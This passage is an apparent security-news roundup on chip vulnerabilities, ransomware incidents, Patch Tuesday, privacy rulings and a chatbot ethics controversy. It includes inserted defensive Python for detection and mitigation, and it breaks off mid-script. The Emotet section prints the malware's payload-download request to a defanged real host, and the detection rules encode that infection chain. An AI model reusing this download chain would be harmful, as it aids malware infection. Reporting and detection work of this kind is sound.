IT NEWS

Google reveals 18 chip vulnerabilities threatening mobile, wearables, vehicles

Google’s Project Zero is warning of multiple significant vulnerabilities affecting many mobile devices, including Samsung Galaxy, Google Pixel and Vivo models, as well as wearables and vehicles that use certain chipsets.

Between late 2022 and early 2023, Project Zero reported 18 vulnerabilities in a chip powering those devices. Of those 18, four are tagged as “top-severity” and could allow silent compromise over the network.

Which devices are affected?

The list of impacted technology is as follows:

  • Mobile devices from Samsung, including those in the S22, M33, M13, M12, A71, A53, A33, A21s, A13, A12 and A04 series
  • Mobile devices from Vivo, including those in the S16, S15, S6, X70, X60 and X30 series
  • The Pixel 6 and Pixel 7 series of devices from Google
  • Any vehicles that use the Exynos Auto T5123 chipset

The four most severe vulnerabilities could allow attackers to remotely compromise a device, with no physical interaction required at any stage. The only thing an attacker needs for the compromise to take place is the intended victim’s phone number.

The other fourteen, while still bad, are nowhere near as severe: exploiting them requires either a malicious mobile network operator or an attacker with local access to the device.

Meanwhile, the Google Security research team believes that the most severe vulnerabilities would allow skilled attackers to create an operational exploit in a short space of time.

Patching and scope of threat

While Google notes that patching depends on the manufacturer, Pixel phones (for example) have already been patched against CVE-2023-24033 in the March security update. If a patch isn’t yet available for your own device, Google has some suggestions to help keep it safe. If your device allows you to, switch off two settings:

  • Wi-Fi calling
  • Voice-over-LTE (VoLTE)

This will remove the risk of exploitation. One potential ramification of disabling VoLTE is that in recent years it has become something of a necessity on some mobile networks. If you’re able to turn it off, then based on the information available you may experience poor call quality and lose certain features and functionality. On the other hand, VoLTE is “not available everywhere on every network, or on every handset”, so it may not matter much depending on your make and model.

As for scope, depending on where your device is from you may not be running the vulnerable chip at all. The Verge notes that phones sold outside of Europe and some African countries use something else altogether. In those instances, you should be fine.


Malwarebytes removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

LockBit ransomware attacks Essendant

The LockBit ransomware group is claiming responsibility for taking down a US-based distributor of office products called Essendant. This attack, which is said to have begun on or around March 6, created severe ramifications for the organisation, disrupting freight carrier pickups, online orders, and access to customer support.

As noted by Bleeping Computer, the original notification that something had gone wrong made no mention of ransomware or even any form of compromise. There’s still no mention on the updated notification page. However, this may be about to change in the wake of LockBit’s claims.

As with so many ransomware groups out there, LockBit is a fan of using stolen data to apply additional pressure and make victims pay the ransom. In cases where the payment is not made, the data is put up for sale, or simply posted online for free. This is a big leveraging factor on many businesses when deciding what to do about ransom threats.

On March 14, LockBit added Essendant to its leaks page with the threat of supposedly stolen data being published by March 18, if its demands are not met.

Essendant data on the LockBit data leak site

The description of the embattled organisation comes with the message “Change a recovery company and try again”. This could be a reference to previous failed attempts to decrypt the compromised data.

LockBit has demonstrated time and again that it will release stolen data if the target refuses to pay. Just last month, Royal Mail found itself on the wrong end of a data dump via the LockBit leak portal after a high profile ransomware attack caused all manner of postal delays.

Unusually, the Royal Mail data dump also came with a chat log of the entire conversation between LockBit and Royal Mail. The log is absolutely fascinating and illustrates the need for victims to employ someone who knows what they’re doing when negotiating with attackers.

LockBit is arguably the most dangerous malware in the world right now. It was by far the most dominant ransomware in 2022, and hasn’t slowed down in 2023, which is why it’s one of the five threats you can’t afford to ignore in our 2023 State of Malware report.

Chart: known attacks by the most prevalent ransomware-as-a-service groups in 2022

Its success comes from its professionalism. LockBit is run as a business: It has a slick website, it avoids the political grandstanding of its competitors, and even offers bug bounties to people who find flaws in its software. It distributes three different versions of its ransomware-as-a-service (RaaS), which are reportedly used by 100 affiliates, and its largest known ransom demand is $80 million.

How to avoid ransomware

  • Block common forms of entry. Create a plan for patching vulnerabilities in internet-facing systems quickly; disable or harden remote access like RDP and VPNs; use endpoint security software that can detect exploits and malware used to deliver ransomware.
  • Detect intrusions. Make it harder for intruders to operate inside your organization by segmenting networks and assigning access rights prudently. Use EDR or MDR to detect unusual activity before an attack occurs.
  • Stop malicious encryption. Deploy Endpoint Detection and Response software like Malwarebytes EDR that uses multiple different detection techniques to identify ransomware, and ransomware rollback to restore damaged system files.
  • Create offsite, offline backups. Keep backups offsite and offline, beyond the reach of attackers. Test them regularly to make sure you can restore essential business functions swiftly.
  • Don’t get attacked twice. Once you’ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again.


Rubrik is latest victim of the Clop ransomware zero-day campaign

Rubrik, a cybersecurity company specializing in cloud data management, has revealed that some of its systems were infiltrated by the Clop ransomware group. Rubrik is one of many companies attacked by Clop via an infamous zero-day vulnerability in the GoAnywhere file transfer software.

The attack began in February, according to its CEO Michael Mestrovich. “We detected unauthorized access to a limited amount of information in one of our non-production IT testing environments as a result of the GoAnywhere vulnerability,” he says in a blog post published Tuesday. Mestrovich claims that “based on our current investigation, being conducted with the assistance of third-party forensics experts, the unauthorized access did NOT include any data we secure on behalf of our customers via any Rubrik products.”

He also revealed that the attackers compromised internal sales data, including customer and partner company names, business contact information, and some purchase orders from Rubrik distributors. According to Mestrovich, the third-party investigators used by Rubrik confirmed that no personal information, such as Social Security Numbers (SSNs), financial accounts, and payment card numbers, was compromised.

The GoAnywhere vulnerability, tracked as CVE-2023-0669, has a severity rating of High and was included in CISA’s Known Exploited Vulnerabilities Catalog, a list of actively exploited vulnerabilities every federal information system must patch urgently. The catalog is an essential go-to list for IT admins trying to prioritize their patching.

The attack on Rubrik happened before an emergency patch was available.

Clop hasn’t been shy about the 130 organizations it’s stolen data from thanks to the GoAnywhere vulnerability. Last week, the gang began sending out extortion emails to the victims, and adding them to its leak site. Known victims include Rubrik, Hatch Bank and Community Health Systems (CHS).

Organizations using GoAnywhere should download the security patch immediately. Fortra has also provided a technical mitigation in its advisory, which can be accessed via the company’s customer portal.


Emotet adopts Microsoft OneNote attachments

Last week, Emotet returned after a three-month absence when the botnet Epoch 4 started sending out malicious emails with malicious Office macros. While the extracted attachments were inflated to several hundred megabytes, it was surprising to see that Emotet persisted in using the same attack format.

Indeed, Microsoft has been rolling out its initiative to auto-block macros in downloaded documents since last summer. This has forced criminals to revisit how they deliver malware via malspam. One noticeable change was the use of Microsoft OneNote documents by several other criminal gangs. Now, it is Emotet’s turn to follow along.


The OneNote file is simple but effective at social engineering users: a fake notification states that the document is protected. When instructed to double-click the View button, victims instead double-click an embedded script file.

This triggers the Windows scripting engine (wscript.exe) to execute the following command:

"%Temp%\OneNote\16.0\NT\click.wsf"

The heavily obfuscated script retrieves the Emotet binary payload from a remote site:

GET https://penshorn[.]org/admin/Ses8712iGR8du/ HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: penshorn.org

The file is saved as a DLL and executed via regsvr32.exe:

"%Temp%\OneNote\16.0\NT\rad44657.tmp.dll"

Once installed on the system, Emotet will then communicate with its command and control servers to receive further instructions.
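As an added example (not Malwarebytes’ detection logic and not code from the original article), the following Python sketch runs two checks over constructed sample telemetry modelled on the chain described above: process-creation events in which wscript.exe runs a .wsf from %Temp%\OneNote\16.0\NT or regsvr32.exe loads a DLL from that same folder, and an HTTP request whose User-Agent is the WinHttp.WinHttpRequest default seen in the capture. The event field names, the sample user name and the benign control event are assumptions; the domain is kept defanged.

```python
import re

# Folder that the OneNote lure's embedded script is dropped into, per the
# article: %Temp%\OneNote\16.0\NT. The regex matches that suffix anywhere in a
# command line (the %Temp% prefix is already expanded in real telemetry).
ONENOTE_TEMP_DIR = re.compile(r"\\Temp\\OneNote\\16\.0\\NT\\", re.IGNORECASE)

# Constructed sample process-creation events (hypothetical telemetry, not real
# data). Field names "parent", "image" and "cmdline" are assumptions.
SAMPLE_EVENTS = [
    {"parent": "ONENOTE.EXE", "image": "wscript.exe",
     "cmdline": r'"C:\Windows\System32\wscript.exe" "C:\Users\alice\AppData\Local\Temp\OneNote\16.0\NT\click.wsf"'},
    {"parent": "wscript.exe", "image": "regsvr32.exe",
     "cmdline": r'regsvr32.exe /s "C:\Users\alice\AppData\Local\Temp\OneNote\16.0\NT\rad44657.tmp.dll"'},
    # Benign control: a vendor DLL registered from Program Files by an installer.
    {"parent": "msiexec.exe", "image": "regsvr32.exe",
     "cmdline": r'regsvr32.exe /s "C:\Program Files\Vendor\plugin.dll"'},
]

# Constructed HTTP request modelled on the capture in the article (domain kept
# defanged so the sample never resolves).
SAMPLE_HTTP_REQUEST = (
    "GET https://penshorn[.]org/admin/Ses8712iGR8du/ HTTP/1.1\r\n"
    "Connection: Keep-Alive\r\n"
    "Accept: */*\r\n"
    "User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)\r\n"
    "Host: penshorn[.]org\r\n"
    "\r\n"
)


def classify_process_event(event):
    """Return the names of the rules a single process-creation event matches."""
    image = event["image"].lower()
    parent = event["parent"].lower()
    cmdline = event["cmdline"]
    in_onenote_temp = ONENOTE_TEMP_DIR.search(cmdline) is not None
    hits = []
    # Stage 1: Windows Script Host running the embedded .wsf from the OneNote temp dir.
    if image == "wscript.exe" and in_onenote_temp and cmdline.lower().rstrip('"').endswith(".wsf"):
        hits.append("wscript_wsf_from_onenote_temp")
    # OneNote itself spawning a script host is suspicious regardless of the path.
    if image == "wscript.exe" and parent == "onenote.exe":
        hits.append("onenote_spawned_wscript")
    # Stage 2: regsvr32.exe executing a DLL dropped into the same folder.
    if image == "regsvr32.exe" and in_onenote_temp and ".dll" in cmdline.lower():
        hits.append("regsvr32_dll_from_onenote_temp")
    return hits


def detect_process_chain(events):
    """Run every rule over a list of events; returns (rule, cmdline) pairs."""
    findings = []
    for event in events:
        for rule in classify_process_event(event):
            findings.append((rule, event["cmdline"]))
    return findings


def parse_http_request(raw):
    """Split a raw HTTP/1.1 request into its request line and a header dict."""
    lines = raw.split("\r\n")
    headers = {}
    for line in lines[1:]:
        if not line:  # blank line ends the header block
            break
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def is_winhttp_script_download(raw):
    """Flag GET requests sent with the WinHttp.WinHttpRequest COM object's
    default User-Agent, which is what a script-driven downloader produces."""
    request_line, headers = parse_http_request(raw)
    user_agent = headers.get("user-agent", "")
    return request_line.startswith("GET ") and "WinHttp.WinHttpRequest" in user_agent


if __name__ == "__main__":
    for rule, cmdline in detect_process_chain(SAMPLE_EVENTS):
        print(f"[{rule}] {cmdline}")
    print("WinHTTP scripted download:", is_winhttp_script_download(SAMPLE_HTTP_REQUEST))
```

The path rule is deliberately narrow (the exact folder named in the article); the parent-process rule is the more durable of the three, since any script host spawned directly by OneNote is worth a look whatever the file is called.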

As Emotet ramps up its malspam distribution, users should be particularly careful of this threat which we featured in our 2023 State of Malware Report, as it serves as an entry point for other threat actors keen on dropping ransomware.

Malwarebytes customers are protected against this threat at several layers within its attack chain, including web protection and malware blocking. Our EDR product also flags the whole sequence.


Although Emotet has taken vacations, announced retirements and even been taken down by authorities before, it continues to be a serious threat and highlights how effective social engineering attacks are. While macros may soon be a thing of the past, we can see that threat actors can leverage a variety of popular business applications to achieve their end goal of gaining a foothold on enterprise networks.

We will continue to monitor any new developments with Emotet to ensure our customers remain protected.


Have a burning question or want to learn more about our cyberprotection? Get a free business trial below.

GET STARTED

Ransomware attack hits ANOTHER school

In what is likely Vice Society’s handiwork, Wymondham College, the UK’s largest state boarding school, has announced it has become the victim of a “sophisticated cyberattack”. The school didn’t provide additional information, but Jonathan Taylor, chief of the school’s parent company Sapientia Education Trust, has revealed the school is yet to receive a ransom note.

In an email to The Record, Taylor said:

“We are not aware of any data breach. A number of the College’s systems have been impacted, including access to some files and resources.” 

Taylor said the school remains open and that the priority is “to ensure continuity of educational provision”. The Norwich Evening News reports that disruption will likely continue until the Easter holidays, as the attack targeted the College’s IT system.

Wymondham College is working with the National Cyber Security Centre (NCSC), the UK’s authority for cyber incidents, to ensure an appropriate response. Taylor says the Department of Education has also been notified.

The NCSC has warned the UK education sector about increasing targeted ransomware attacks on schools, colleges, and universities. However, the latest research from the London Grid for Learning (LGfL) reveals that only 53 percent of UK schools feel prepared for a cyberattack.


Hackers threaten to leak STALKER 2 assets if devs don’t heed demands

Ukrainian game developer GSC Game World has announced that it was breached by Russian hacktivists who stole assets related to the much-awaited game STALKER 2: Heart of Chernobyl.

According to GSC, the hacktivists accessed an employee’s image app account and stole STALKER 2’s full story, cut scenes, various concept art, global maps, and more. The company said these assets are being used for blackmail and intimidation.

“We have been enduring constant cyberattacks for more than a year now,” the GSC Game World team said in its announcement.

“We have faced blackmail, acts of aggression, attempts to hurt players and fans, and efforts to damage the development process of the reputation of our company.”

A group named Vestnik TSS has claimed responsibility and has given the devs an ultimatum: Do as we say, or we’ll leak all stolen STALKER 2 assets.

“Nick Frost”, a Vestnik TSS administrator, posted the group’s demands on the Russian social media site VK.com. Below is a screenshot of the English-translated post:

[Screenshot: English translation of the Vestnik TSS post on VK.com]

Vestnik TSS wants GSC to apologize to players in Russia and Belarus for its perceived “unworthy attitude” towards them, un-ban certain Russian accounts on its official Discord server, and bring back the Russian localization of STALKER 2. The group gave the developers until March 15, Wednesday, to make these changes.

It appears, however, that Vestnik TSS leaked some of the stolen files before yesterday’s deadline. The group’s VK page is awash with concept art, including an overview of mutant NPCs, bits of the game world’s map, and artifacts. On Tuesday, a user with the alias “Daniel Nexus”, likely another admin, posted more STALKER 2 assets as a password-protected archive.

GSC Game World is yet to respond to the demands, and judging by the tone of its message, I suspect the developers have no intention of complying. Instead, the team has pleaded with the STALKER community to refrain from watching or distributing the leaked materials.

“Outdated and work-in-progress materials may dilute the impression of the final idea that we have put into the game. We encourage you to stay patient and wait for the official release for the best experience possible. We believe that you will love it.”



Facebook illegally processed user data, says court

The Amsterdam court has ruled that Facebook illegally processed user data in a case started by the Dutch Data Privacy Stichting (DPS), a foundation that acts on behalf of victims of privacy violations in the Netherlands.

According to the ruling, Facebook used personal data for advertising purposes in the period April 1, 2010, to January 1, 2020, when this was not allowed. The same ruling also says that Facebook shared personal data with third parties without any legal basis to do so, and without informing the users themselves. Without properly informing users there can be no consent.

The DPS and the Dutch Consumentenbond—a consumers association with over 400,000 members—filed a class-action suit against Facebook Ireland, which is the European subsidiary of Meta that oversees the processing of Dutch user data. This ruling doesn’t mean damages can yet be claimed by the 185,000+ people that are represented in the class-action suit, but it’s one step closer. Based on this ruling, the group now hopes to sit down with Facebook to negotiate a settlement. Any of the roughly 10 million Dutch people who used Facebook during the relevant period can join if the case moves to a damages phase.

The main complaints were that Facebook used personal data for advertising and shared data like sexual preferences and religion with third parties. The data in question were both provided by the users themselves and derived by Facebook from the users’ browsing behavior outside of Facebook itself. Facebook not only shared users’ personal data with third parties but also the personal data of their Facebook friends.

Facebook was cleared of the complaint that it placed cookies on third-party websites. The court ruled that it had transferred the responsibility for those cookies to the website owners, and had the right to do so. Facebook was also cleared of enrichment charges, as the court found insufficient proof that Facebook’s monetary gain from these actions resulted in direct damages to the users.

A spokesperson for Meta said the company was “pleased” with parts of the decision but would appeal others, noting that some of the claims date back more than a decade.

Austria

In Austria, the Datenschutzbehörde (DSB) partially upheld a complaint by the privacy organization noyb that Meta’s tracking pixels conflict with European GDPR rules. The website owner was found to be in breach of the GDPR because personal data of users (at least unique user identification numbers, IP addresses and browser parameters) was transferred to the USA without ensuring an adequate level of protection.

Last year the Austrian privacy watchdog ruled against Google Analytics as being in conflict with GDPR regulations. According to noyb, the same rules apply to Facebook Login and Meta Pixel because these tools also send data to the US.

Together these rulings may have serious consequences for all European-based website owners. Because of the responsibility website owners take on by using these tools, they can be held liable for the fact that Meta and Google send data to the US without ensuring an adequate level of protection.



Update now! Microsoft fixes two zero-day bugs

Microsoft and other vendors have released their monthly updates. Microsoft has fixed a total of 101 vulnerabilities across several products (including Edge), two of which are actively exploited zero-days. On top of that, Adobe has fixed an actively exploited vulnerability in ColdFusion.

The Common Vulnerabilities and Exposures (CVE) database lists publicly disclosed computer security flaws. The CVEs of the actively exploited vulnerabilities patched in these updates are:

CVE-2023-23397: a critical Microsoft Outlook Elevation of Privilege (EoP) vulnerability. External attackers could send specially crafted emails that cause the victim’s Outlook to connect to an external UNC location under the attacker’s control. This leaks the victim’s Net-NTLMv2 hash to the attacker, who could then relay it to another service and authenticate as the victim. The exploit is triggered automatically when the email is retrieved and processed by the Outlook client, so exploitation can occur before the email is even viewed in the Preview Pane.

This means the vulnerability could be used to obtain a hashed token, which could then be used in a so-called “pass-the-hash” attack. Windows NT LAN Manager (NTLM) is a challenge-response authentication protocol used to authenticate a client to a resource on an Active Directory domain. When the client requests access to a service associated with the domain, the service sends a challenge to the client, requiring the client to perform a mathematical operation using its authentication token and return the result to the service. The service may validate the result itself or send it to the Domain Controller (DC) for validation. If the service or DC confirms that the client’s response is correct, the service grants the client access. Sounds secure, right? Well, the fun part is that the hash alone is enough information to perform the mathematical operation required to gain access. The authentication process does not require the plaintext password. The hash is enough.
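To make the challenge-response description concrete, here is an added Python model (not Microsoft’s implementation and not code from the original article) of the NTLMv2 exchange: the client proves knowledge of the credential by returning an HMAC-MD5 over the server’s challenge, and the verifier recomputes that HMAC from the hash it stores. The password never enters the computation, only its hash, which is exactly the property the paragraph above describes. Two simplifications are assumptions of this example: the NT hash is replaced by a SHA-256 stand-in (the real one is MD4 over the UTF-16LE password, which needs OpenSSL’s legacy provider on current Pythons), and the client blob is reduced to random bytes. The user name, domain and password are constructed.

```python
import hashlib
import hmac
import os


def nt_hash(password):
    """Stand-in for the NT hash. The real NT hash is MD4(UTF-16LE(password));
    MD4 is unavailable without OpenSSL's legacy provider, so SHA-256 truncated
    to 16 bytes is substituted here. Everything downstream is unchanged by this."""
    return hashlib.sha256(password.encode("utf-16-le")).digest()[:16]


def ntlmv2_key(nt_hash_bytes, user, domain):
    """NTOWFv2: HMAC-MD5 keyed with the NT hash over UPPER(user) + domain (UTF-16LE)."""
    identity = (user.upper() + domain).encode("utf-16-le")
    return hmac.new(nt_hash_bytes, identity, hashlib.md5).digest()


def ntlmv2_response(nt_hash_bytes, user, domain, server_challenge, client_blob):
    """NTProofStr: HMAC-MD5 over the 8-byte server challenge and the client blob.
    Note the inputs: a hash plus two public values, never the password itself."""
    key = ntlmv2_key(nt_hash_bytes, user, domain)
    return hmac.new(key, server_challenge + client_blob, hashlib.md5).digest()


def verify_response(stored_nt_hash, user, domain, server_challenge, client_blob, response):
    """What the service (or the DC it forwards to) does: recompute and compare."""
    expected = ntlmv2_response(stored_nt_hash, user, domain, server_challenge, client_blob)
    return hmac.compare_digest(expected, response)


def run_exchange(password="correct horse battery staple", user="alice", domain="CORP"):
    """Walk through one exchange and report which checks pass (constructed credentials)."""
    stored = nt_hash(password)      # the credential store holds this, never the password
    challenge = os.urandom(8)       # server -> client
    client_blob = os.urandom(16)    # simplified: the real blob carries a timestamp, nonce and target info

    # Legitimate client: derives the hash from the typed password, then answers.
    response = ntlmv2_response(nt_hash(password), user, domain, challenge, client_blob)
    legit_ok = verify_response(stored, user, domain, challenge, client_blob, response)

    # A party holding only the stored hash produces an equally valid answer:
    # the verifier cannot tell the two apart, which is the point made above.
    hash_only = ntlmv2_response(stored, user, domain, challenge, client_blob)
    hash_only_ok = verify_response(stored, user, domain, challenge, client_blob, hash_only)

    # The same response presented against a fresh challenge fails: a captured
    # response is bound to the challenge it answered and cannot be replayed later.
    fresh_challenge = os.urandom(8)
    stale_ok = verify_response(stored, user, domain, fresh_challenge, client_blob, response)

    return {"legit_valid": legit_ok, "hash_only_valid": hash_only_ok, "stale_challenge_valid": stale_ok}


if __name__ == "__main__":
    print(run_exchange())
```

The third check is why a captured response by itself has limited value and why the protocol’s weakness is that the stored hash is a password-equivalent: anything that protects the hash (or removes NTLM from the path entirely) protects the account.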

CVE-2023-24880: a moderate Windows SmartScreen Security Feature Bypass vulnerability. An attacker could craft a malicious file that evades Mark of the Web (MOTW) defenses, resulting in a limited loss of integrity and availability of security features such as Protected View in Microsoft Office, which rely on MOTW tagging. Reportedly, this vulnerability was used in ransomware-related attacks.

MOTW, the technology that ensures Windows pops up a warning when you try to open a file downloaded from the Internet, makes another comeback. The MOTW is an attribute Windows adds to files sourced from an untrusted location, like the internet or a Restricted Zone. When you download a file from the internet, Windows adds the zone identifier, or Mark of the Web, to the file as an NTFS alternate data stream. When you run the file, Windows SmartScreen checks whether a Zone.Identifier Alternate Data Stream (ADS) is attached to it. If the ADS indicates ZoneId=3, meaning the file was downloaded from the internet, SmartScreen performs a reputation check.
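As an added example (not Microsoft’s code and not from the original article), here is a small Python parser for the Zone.Identifier stream described above, with the ZoneId-to-zone mapping Windows uses and a Windows-only reader that opens the stream through the file:stream path syntax. The sample stream content is constructed; the ReferrerUrl and HostUrl keys are the ones Windows writes alongside ZoneId for browser downloads.

```python
import sys

# URL security zone numbers as Windows writes them into ZoneId.
ZONE_NAMES = {
    0: "Local machine",
    1: "Local intranet",
    2: "Trusted sites",
    3: "Internet",
    4: "Restricted sites",
}

# Constructed example of a Zone.Identifier stream as written for a browser
# download; the URLs are placeholders.
SAMPLE_ZONE_IDENTIFIER = (
    "[ZoneTransfer]\r\n"
    "ZoneId=3\r\n"
    "ReferrerUrl=https://example.invalid/downloads\r\n"
    "HostUrl=https://example.invalid/downloads/report.iso\r\n"
)


def parse_zone_identifier(text):
    """Parse the INI-style stream; returns the keys of its [ZoneTransfer] section."""
    section = None
    values = {}
    for raw_line in text.splitlines():
        line = raw_line.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1]
            continue
        if section == "ZoneTransfer" and "=" in line:
            key, _, value = line.partition("=")
            values[key.strip()] = value.strip()
    return values


def zone_id(text):
    """ZoneId as an int, or None when the key is absent or malformed (treat as untagged)."""
    try:
        return int(parse_zone_identifier(text).get("ZoneId"))
    except (TypeError, ValueError):
        return None


def zone_name(text):
    zid = zone_id(text)
    if zid is None:
        return "no mark"
    return ZONE_NAMES.get(zid, "unknown")


def triggers_reputation_check(text):
    """SmartScreen's reputation check applies when the mark says ZoneId=3 (Internet)."""
    return zone_id(text) == 3


def read_zone_identifier(path):
    """Read a file's Zone.Identifier ADS on NTFS. Returns None when the file carries
    no mark. Only Windows exposes alternate data streams via the 'file:stream' syntax."""
    if not sys.platform.startswith("win"):
        raise OSError("alternate data streams are only readable on Windows/NTFS")
    try:
        with open(path + ":Zone.Identifier", "r", encoding="utf-8", errors="replace") as stream:
            return stream.read()
    except FileNotFoundError:
        return None


if __name__ == "__main__":
    print(zone_name(SAMPLE_ZONE_IDENTIFIER), triggers_reputation_check(SAMPLE_ZONE_IDENTIFIER))
```

On a Windows host, `read_zone_identifier(r"C:\Users\alice\Downloads\report.iso")` returns the stream text (or None for an unmarked file), which can then be fed to the same parser; a file that arrived without the mark, which is the condition a MOTW bypass produces, shows up as "no mark" rather than as a misparse.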

CVE-2023-26360: classified as a priority 1 vulnerability in Adobe ColdFusion, a critical deserialization of untrusted data. This flaw can lead to arbitrary code execution, making it a high-priority target for attackers.

Adobe says it is aware that CVE-2023-26360 has been exploited in the wild in very limited attacks targeting Adobe ColdFusion.

Adobe recommends updating your ColdFusion versions 2021 and 2018 JDK/JRE to the latest version of the LTS releases for JDK 11. Applying the ColdFusion update without a corresponding JDK update will NOT secure the server.

Adobe also recommends customers apply the security configuration settings as outlined on the ColdFusion Security page as well as review the respective Lockdown guides.

Other vendors

Other vendors have synchronized their periodic updates with Microsoft. Here are a few major ones that you may find in your environment.

  • SAP has released security updates for 19 vulnerabilities, five of which were rated as critical.


“Just awful” experiment points suicidal teens at chatbot

After getting in hot water for using an AI chatbot to provide mental health counseling, non-profit startup Koko has now been criticized for experimenting with young adults at risk of harming themselves. Worse, the young adults were unaware they were test subjects.

Motherboard reports the experiment took place between August and September 2022. At-risk subjects, aged 18 to 25, were directed to a chatbot after posting “crisis-related” keywords like “depression” and “sewer-slide” on Discord, Facebook Messenger, Telegram, and Tumblr. They were then randomly assigned to a group that received a “typical crisis response” (call the crisis hotline), or a “one-minute, enhanced crisis response Single-Session Intervention (SSI)” powered by AI.

Rob Morris, Koko co-founder and Stony Brook University professor, carried out the experiment with his psychology peers, Katherine Cohen, Mallory Dobias, and Jessica Schleider. The study says it aims to show social media platforms that pointing young adults to crisis hotlines isn’t enough. Morris says he wants to show that an AI chatbot intervention is more effective in supporting young adults struggling with mental health issues.

However, this appears to only look good on paper.

Before Koko performs what it was designed to do, it first presents its privacy policy and terms of service (ToS), telling users their anonymous data may be shared and used for research. Here lies the first problem: Consent to take part in the project is given by agreeing to Koko’s privacy policy and ToS. As we all know, a great majority of people online normally don’t read these. Presumably, it’s not the first thought for at-risk young adults either.

When asked about provisions for true consent, Morris tells Motherboard, “There are many situations in which the IRB would exempt researchers from obtaining consent for very good reasons because it could be unethical, or impractical, and this is especially common for internet research. It’s nuanced.” An IRB, or institutional review board, is also called a research ethics committee. Essentially, they’re the group protecting human research subjects.

The second problem involves data. The preprint reveals that subjects provided their age, gender identity, and sexual identity to the researchers. Such datasets may be anonymous, but studies show these can still be traced back to specific individuals with a high accuracy of 99.98 percent. “Most IRBs give a pass to ‘de-identified’ research as they claim there can be no privacy or security harms. But, in this case, they are collecting demographic information which could be used to identify users,” said Eric Perakslis, the chief science and digital officer at the Duke Clinical Research Institute, Motherboard reports.

And the last problem, which alarmed and appalled researchers and psychologists alike, was that the experiment was carried out as “nonhuman subjects research.” This means subjects were stripped of the safety- and privacy-related protections they were due.

“Completely, horribly unethical. Mucking around in an experimental manner with unproven interventions on potentially suicidal persons is just awful,” New York University bioethics professor Arthur Caplan was quoted as saying.

“If this is the way entrepreneurs think they can establish AI for mental diseases and conditions, they had best plan for a launch filled with backlash, lawsuits, condemnation and criticism. All of which are entirely earned and deserved.”

“I have not in recent years seen a study so callously asleep at the ethical wheel. Dealing with suicidal persons in this way is inexcusable,” he added.



Clop ransomware is victimizing GoAnywhere MFT customers

According to information gathered by BleepingComputer, the Clop ransomware group has claimed responsibility for the ransomware attacks that are tied to a vulnerability in the Fortra GoAnywhere MFT secure file-sharing solution.

As we reported on February 8, Fortra released an emergency patch (7.1.2) for an actively exploited zero-day vulnerability found in the GoAnywhere MFT administrator console.

GoAnywhere MFT, which stands for managed file transfer, allows businesses to manage and exchange files in a secure and compliant way. According to its website, it caters to more than 3,000 organizations, predominantly ones with over 10,000 employees and $1 billion in revenue.

Some of these organizations are considered vital infrastructure such as local governments, financial companies, healthcare organizations, energy firms, and technology manufacturers.

The day after the release of the GoAnywhere patch, the Clop ransomware gang contacted BleepingComputer and said it had used the flaw over ten days to steal data from 130 companies. At the time it was impossible to confirm this claim, but after two earlier victims, Community Health Systems (CHS) and Hatch Bank, disclosed that data was stolen in the GoAnywhere MFT attacks, the Clop leak site now shows seven new companies. At least two of them have reportedly been breached using the GoAnywhere MFT vulnerability.

The Common Vulnerabilities and Exposures (CVE) database lists publicly disclosed computer security flaws. The CVE of the exploited vulnerability is CVE-2023-0669, described as a pre-authentication command injection vulnerability in the License Response Servlet caused by deserializing an arbitrary attacker-controlled object.

It is unknown whether these victims were targeted during the time that there was no patch available for the vulnerability or later. Recent scans showed that around 1,000 administrative consoles are publicly exposed to the internet. The Web Client interface, which is the one that is normally accessible from the public internet, is not susceptible to this exploit, only the administrative interface.

Mitigation

If your GoAnywhere MFT administration portal is exposed to the Internet, you are under urgent advice to download the security patch from the Product Downloads tab at the top of the GoAnywhere account page which you will see after logging in.

If for some reason you can’t install the patch, Fortra says you should follow the mitigation steps it put out, which involve restricting access so that the administrator console is only reachable from trusted sources, or disabling the licensing service altogether. There is also a technical mitigation configuration shared in the advisory that is only visible after logging in (which can be done with a free account if you are interested).

On the file system where GoAnywhere MFT is installed, edit the file [install_dir]/adminroot/WEB_INF/web.xml

Find and remove (delete or comment out) the following servlet and servlet-mapping configuration, shown below before and after the change.

Before:

 <servlet>
      <servlet-name>License Response Servlet</servlet-name>
      <servlet-class>com.linoma.ga.ui.admin.servlet.LicenseResponseServlet</servlet-class>
      <load-on-startup>0</load-on-startup>
 </servlet>

 <servlet-mapping>
      <servlet-name>Licenses Response Servlet</servlet-name>
      <url-pattern>/lic/accept/</url-pattern>
 </servlet-mapping>

After:

 <!--
 Add these tags to comment out the following section (as shown) or simply delete this section if you are not familiar with XML comments
 <servlet>
      <servlet-name>License Response Servlet</servlet-name>
      <servlet-class>com.linoma.ga.ui.admin.servlet.LicenseResponseServlet</servlet-class>
      <load-on-startup>0</load-on-startup>
 </servlet>

 <servlet-mapping>
      <servlet-name>Licenses Response Servlet</servlet-name>
      <url-pattern>/lic/accept/</url-pattern>
 </servlet-mapping>
 -->

Restart the GoAnywhere MFT application.

If GoAnywhere MFT is clustered, this change needs to happen on every instance node in the cluster.
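The web.xml edit above is a manual step. As an added example (not Fortra’s tooling and not code from the original article), the Python script below applies the same change programmatically and verifies it: it drops any <servlet> whose class is com.linoma.ga.ui.admin.servlet.LicenseResponseServlet and any <servlet-mapping> for /lic/accept/ or for the removed servlet’s name. It matches on the class and URL pattern rather than on the display name because the advisory’s <servlet> and <servlet-mapping> blocks spell that name differently. The embedded web.xml is constructed, and the javaee namespace URI and the extra “Other Servlet” entries in it are assumptions used to check that unrelated configuration survives the edit; run it against a copy of every cluster node’s file.

```python
import xml.etree.ElementTree as ET

# Values taken from the advisory text above.
LICENSE_SERVLET_CLASS = "com.linoma.ga.ui.admin.servlet.LicenseResponseServlet"
LICENSE_URL_PATTERN = "/lic/accept/"

# Constructed stand-in for [install_dir]/adminroot/WEB_INF/web.xml. The
# namespace and the "Other Servlet" entries are assumptions.
SAMPLE_WEB_XML = """<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns="http://java.sun.com/xml/ns/javaee" version="3.0">
  <servlet>
    <servlet-name>Other Servlet</servlet-name>
    <servlet-class>com.example.OtherServlet</servlet-class>
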